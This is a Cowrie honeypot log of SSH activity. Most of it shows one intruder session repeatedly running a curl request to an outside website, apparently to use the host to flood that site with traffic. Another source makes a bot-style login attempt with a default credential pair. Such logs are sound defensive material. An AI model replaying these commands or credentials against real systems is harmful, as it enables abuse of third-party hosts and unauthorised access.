{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.623889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.624886Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.662121Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.663133Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.700201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.701310Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.741298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.742177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.783341Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.784607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.822928Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.823813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.867455Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.868426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.908705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.909647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.952544Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.953829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.993351Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.994398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.032536Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.033543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.071393Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.072706Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.109673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.110708Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.151773Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.153009Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.190192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.191264Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.231945Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.233090Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.271464Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.272507Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.310546Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.311626Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.349029Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.350083Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.389388Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.390872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.429362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.430560Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.432266Z","src_ip":"223.197.186.7","session":"6abacb09da6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.467963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.468988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.505761Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.506773Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.544598Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.545548Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.584219Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.585426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.630401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.631415Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.670755Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.671697Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.719370Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.720649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.759963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.761024Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.804846Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.805899Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.845987Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.847090Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.884503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.885451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.923789Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.924721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:09.961826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:09.962782Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.003173Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.004689Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.046417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.048071Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.091740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.092645Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.138739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.139729Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.180297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.181695Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.218867Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.219878Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.261353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.262364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.305743Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.307099Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.344962Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.345975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.383975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.384902Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.421813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.422748Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.459703Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.460617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.520458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.521658Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.560447Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.561439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.599037Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.600104Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.639273Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.640339Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.677476Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.678475Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.689816Z","src_ip":"223.197.186.7","session":"6abacb09da6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.715187Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.716171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.755183Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.756063Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.823616Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.824628Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.861966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.862947Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.899608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.900518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.943418Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.944381Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"223.197.186.7","src_port":61573,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fc2530ca8b7","protocol":"ssh","message":"New connection: 223.197.186.7:61573 (1.2.3.4:22) [session: 3fc2530ca8b7]","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.951398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.952329Z","src_ip":"223.197.186.7","session":"3fc2530ca8b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:10.981107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:10.982033Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.019749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.021139Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.060342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.061265Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.097989Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.098994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.137747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.138782Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.175416Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
